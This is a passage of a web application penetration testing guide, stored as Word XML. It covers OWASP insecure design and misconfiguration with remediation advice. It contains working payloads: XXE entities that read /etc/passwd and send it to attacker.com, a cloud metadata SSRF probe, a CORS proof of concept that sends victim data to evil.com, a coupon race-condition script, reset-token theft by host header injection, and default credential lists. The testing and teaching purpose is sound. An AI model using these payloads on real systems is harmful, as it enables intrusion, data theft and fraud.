      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">XXE to SSRF — probe internal network:</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&lt;!DOCTYPE root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&lt;!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/"&gt;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&lt;data&gt;&amp;xxe;&lt;/data&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind OOB XXE (when output is not reflected):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 Your malicious DTD hosted at attacker.com/evil.dtd: --&gt;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&lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;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&lt;!ENTITY % exfil "&lt;!ENTITY exfiltrate SYSTEM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'http://attacker.com/?d=%file;'&gt;" &gt;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%exfil;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 In the request: --&gt;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&lt;!DOCTYPE root [&lt;!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"&gt; %dtd;]&gt;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&lt;data&gt;&amp;exfiltrate;&lt;/data&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">XXE via file upload — malicious SVG or DOCX:</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 Upload as SVG file with .svg extension: --&gt;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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE svg [&lt;!ENTITY xxe SYSTEM "file:///etc/hostname"&gt;]&gt;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&lt;svg&gt;&amp;xxe;&lt;/svg&gt;</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3.6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Use parameterized queries / prepared statements — never concatenate user input into SQL strings. Use a safe API layer for NoSQL. Validate, sanitize, and encode all inputs. Use Content-Security-Policy headers to mitigate XSS. Disable XML external entity processing in the XML parser configuration. Use allowlists for valid input values where possible.</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A04 — Insecure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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D35400" w:sz="4"/>
              <w:left w:val="single" w:color="D35400" w:sz="4"/>
              <w:bottom w:val="single" w:color="D35400" w:sz="4"/>
              <w:right w:val="single" w:color="D35400" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A new category in 2021 focusing on design flaws and missing security controls at the architecture level — not just implementation bugs. Business logic flaws live here.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure design refers to risks that originate from missing or ineffective design controls. This is distinct from implementation bugs — it is about fundamental flaws in how the application was conceived. Business logic attacks exploit these design flaws to achieve unintended behavior.</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4.1 Business Logic Flaws</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Business logic flaws are application-specific. They require understanding how the application is supposed to work and finding ways to break that assumption. These are almost never caught by automated scanners.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54360" w:sz="6"/>
              <w:left w:val="single" w:color="154360" w:sz="6"/>
              <w:bottom w:val="single" w:color="154360" w:sz="6"/>
              <w:right w:val="single" w:color="154360" w:sz="6"/>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Flaw Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="154360" w:sz="6"/>
              <w:left w:val="single" w:color="154360" w:sz="6"/>
              <w:bottom w:val="single" w:color="154360" w:sz="6"/>
              <w:right w:val="single" w:color="154360" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="154360" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">What to Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Price/Quantity Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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Negative quantities, zero prices, price in hidden form fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Workflow Skipping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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Can you jump from step 1 directly to step 5 in a checkout/reset flow?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Coupon/Voucher Abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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Apply same coupon multiple times, use expired coupons</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Role Assumption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="636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Can a free user access paid features by changing a flag?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Account Linking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0C0C0" w:sz="2"/>
              <w:left w:val="single" w:color="C0C0C0" w:sz="2"/>
              <w:bottom w:val="single" w:color="C0C0C0" w:sz="2"/>
              <w:right w:val="single" w:color="C0C0C0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Link attacker OAuth account to victim account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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b/>
                <w:bCs/>
                <w:color w:val="154360"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Password Reset Abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0C0C0" w:sz="2"/>
              <w:left w:val="single" w:color="C0C0C0" w:sz="2"/>
              <w:bottom w:val="single" w:color="C0C0C0" w:sz="2"/>
              <w:right w:val="single" w:color="C0C0C0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reset another user's password, token reuse, expired tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Price manipulation — intercept and modify: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POST /api/cart/add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{"item_id": "X100", "quantity": 1, "price": 0.01}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Or negative quantity for store credit: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{"item_id": "X100", "quantity": -1}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-step workflow abuse — skip steps using direct requests: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Normal flow: /checkout/step1 → /checkout/step2 → /checkout/step3 → /checkout/confirm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Test: POST directly to /checkout/confirm without completing earlier steps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Does the server validate that previous steps were completed?</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4.2 Race Condition Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Race conditions occur when an application's behaviour depends on the timing of events. A classic example is a "limit one coupon per user" feature that can be bypassed by sending multiple redemption requests simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Race condition — coupon double-spend with Python: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import threading, requests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SESSION = "your_session_cookie_value"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 = "https://target.com/api/redeem-coupon"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def redeem():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r = requests.post(URL,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json={"coupon": "SAVE50"},</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cookies={"session": SESSION})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print(r.status_code, r.text[:100])</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threads = [threading.Thread(target=redeem) for _ in range(20)]</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[t.start() for t in threads]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[t.join() for t in threads]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite Turbo Intruder — synchronized race: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Use Turbo Intruder with "race" template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Send all 20 requests in a single TCP connection burst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This removes network jitter and makes race more reliable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Password reset race — two accounts, same token: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1. Request password reset for victim@email.com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2. Request password reset for your own account simultaneously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3. Race: does the token from your email work for victim?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Especially dangerous if token is time-based (TOTP or timestamp)</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4.3 Password Reset Flow Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Common vulnerabilities in password reset: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1. Predictable token — md5(email + timestamp)</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2. No expiry — token valid for days/forever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3. Token in URL — leaks via Referer header to analytics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4. Token not invalidated after use — can reset multiple times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5. Host header injection in reset link:</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Original request: POST /forgot-password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Add: Host: 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Result: Reset link in email points to evil.com/reset?token=SECRET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Victim clicks, attacker captures token on evil.com</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4.4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Threat model during design phase — ask "what is the worst way this feature could be abused?" Implement server-side state validation for multi-step flows. Use cryptographically random tokens for password resets with short expiry (15 min). Use database-level locks for operations that must be atomic. Never trust client-side values for prices, roles, or quantities.</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A05 — Security Misconfiguration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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D35400" w:sz="4"/>
              <w:left w:val="single" w:color="D35400" w:sz="4"/>
              <w:bottom w:val="single" w:color="D35400" w:sz="4"/>
              <w:right w:val="single" w:color="D35400" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The most common finding in web app pentests. Includes missing security headers, verbose error messages, default credentials, unnecessary features, and cloud misconfigurations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="154360"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 HTTP Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Check all security headers: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curl -I https://target.com 2&gt;/dev/null | grep -iE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"strict-transport|content-security|x-frame|x-content-type|referrer|permissions"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Missing headers are findings — document each one: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Strict-Transport-Security   → Missing = HSTS not enforced (HTTP downgrade possible)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Content-Security-Policy     → Missing = XSS easier to exploit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X-Frame-Options             → Missing = Clickjacking possible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X-Content-Type-Options      → Missing = MIME sniffing attacks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Referrer-Policy             → Missing = URL leakage to third parties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Permissions-Policy          → Missing = Feature abuse (camera, mic, geolocation)</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5.2 CORS Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A misconfigured CORS policy can allow attacker.com to make authenticated requests to your API and read the response — bypassing the Same-Origin Policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Test CORS with crafted Origin headers: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curl -H "Origin: https://evil.com" -I https://target.com/api/user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Vulnerable if response contains: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Access-Control-Allow-Origin: https://evil.com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Access-Control-Allow-Credentials: true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Test origin variations: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Origin: https://evil.com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Origin: https://target.com.evil.com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Origin: null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Origin: https://evil-target.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CORS exploit PoC — run from attacker.com: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&lt;script&gt;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fetch("https://target.com/api/profile", {credentials: "include"})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.then(r =&gt; r.text())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.then(d =&gt; fetch("https://evil.com/steal?data=" + btoa(d)))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&lt;/script&gt;</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5.3 Automated Misconfiguration Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Nikto — web server misconfiguration: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nikto -h https://target.com -ssl -Tuning 1234567890</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Nuclei — template-based scanning (best for mass findings):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nuclei -u https://target.com -t /nuclei-templates/ -severity critical,high,medium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nuclei -u https://target.com -t /nuclei-templates/cves/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nuclei -u https://target.com -t /nuclei-templates/exposures/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nuclei -u https://target.com -t /nuclei-templates/misconfiguration/</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5.4 High-Value Exposed Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Always check these — frequently exposed in misconfigured deployments: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/actuator            /actuator/env        /actuator/heapdump   (Spring Boot)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/swagger-ui.html     /api-docs            /v2/api-docs         (API Documentation)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/graphql             /graphiql            /__graphql            (GraphQL)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/console             /h2-console          (H2 In-Memory DB)</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/jmx-console         /web-console         (JBoss)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/server-status       /server-info         (Apache)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/phpinfo.php         /info.php            /test.php</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/adminer.php         /phpmyadmin          (Database Admin)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/wp-admin            /wp-login.php        (WordPress)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/.git/config         /.git/HEAD           (Git Repository)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/.env                /.env.local          /.env.production</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5.5 Default Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Common default creds to try on any admin panel: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admin:admin          admin:password        admin:admin123</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root:root            root:toor             test:test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administrator:administrator               guest:guest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admin:               (blank password)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Also try: application name as password, company name, hostname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5.6 Verbose Error Messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger errors to find stack traces and internal paths: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Send unexpected input types, very long values, special characters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GET /api/user?id=AAAAAAAAAAAAA'"&lt;&gt;\x00</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Look for: technology versions, internal IP, file paths, DB queries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Python traceback → reveals file paths and framework</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PHP Warning → reveals full server path</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Java stack trace → reveals class/package names, versions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5.7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Establish a hardening baseline and apply it to all deployments. Disable all unused features, ports, and endpoints. Set all security headers. Implement a minimal permissions principle. Remove default accounts or change default credentials immediately after deployment. Configure detailed error logging server-side but show only generic messages to users. Regularly scan for misconfigurations with nuclei or similar tools.</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A06 — Vulnerable &amp; Outdated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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7860"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D35400" w:sz="4"/>
              <w:left w:val="single" w:color="D35400" w:sz="4"/>
              <w:bottom w:val="single" w:color="D35400" w:sz="4"/>
              <w:right w:val="single" w:color="D35400" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Using components with known vulnerabilities is one of the most common attack paths. Libraries, frameworks, and their dependencies must all be tracked and updated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="154360"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Fingerprinting the Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
